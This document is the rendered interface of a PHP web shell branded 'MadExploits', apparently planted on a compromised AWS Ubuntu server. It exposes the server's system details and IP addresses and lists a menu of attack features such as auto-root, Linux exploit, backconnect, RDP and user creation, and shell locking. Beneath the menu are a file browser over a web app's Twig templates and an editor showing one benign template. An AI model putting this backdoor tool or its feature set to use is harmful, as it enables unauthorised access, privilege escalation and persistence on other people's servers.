Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.16.139.36
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mixchief_app /
templates /
Stock /
[ HOME SHELL ]
Name
Size
Permission
Action
add.html.twig
1.26
KB
-rw-rw-r--
add_spillage.html.twig
0
B
-rw-rw-r--
editsupply.html.twig
6.25
KB
-rw-rw-r--
index.html.twig
4.75
KB
-rw-rw-r--
itemSupplies.html.twig
2.23
KB
-rw-rw-r--
spillage.html.twig
3.04
KB
-rw-rw-r--
stocksupplies.html.twig
1.32
KB
-rw-rw-r--
supplier.html.twig
3.34
KB
-rw-rw-r--
supplies.html.twig
1.61
KB
-rw-rw-r--
supply.html.twig
6.3
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : add.html.twig
{% extends 'base1.html.twig' %} {% block content %} <div class="content"> <div class="row"> <div class="col-sm-6"> <div class="card"> <div class="card-body"> <table class="table table-default"> <thead> <tr> <th>Name</th> <th>Action</th> </tr> </thead> <tbody> {% for item in groups %} <tr> <td>{{ item.name }}</td> <td><a class="btn btn-primary" href="{{ path('group', {'id': item.id }) }}">Edit</a></td> </tr> {% endfor %} </tbody> </table> </div> </div> </div> <div class="col-sm-6"> <div class="card"> <div class="card-header"> <h3>{% if group %}Edit{% else %}Add{% endif %} Category</h3> </div> <div class="card-body"> <form action="{{ path('group') }}" method="POST" name="edit"> {% if group %}<input type="hidden" name="edit" value="{{ group.id }}">{% endif %} <div class="form-group"> <input type="text" name="name" class="form-control" placeholder="Group Name" value="{{ group.name|default('') }}"> </div> <input type="submit" name="submit" value="Save" class="btn-primary"> </form> </div> </div> </div> </div> </div> {% endblock %}
Close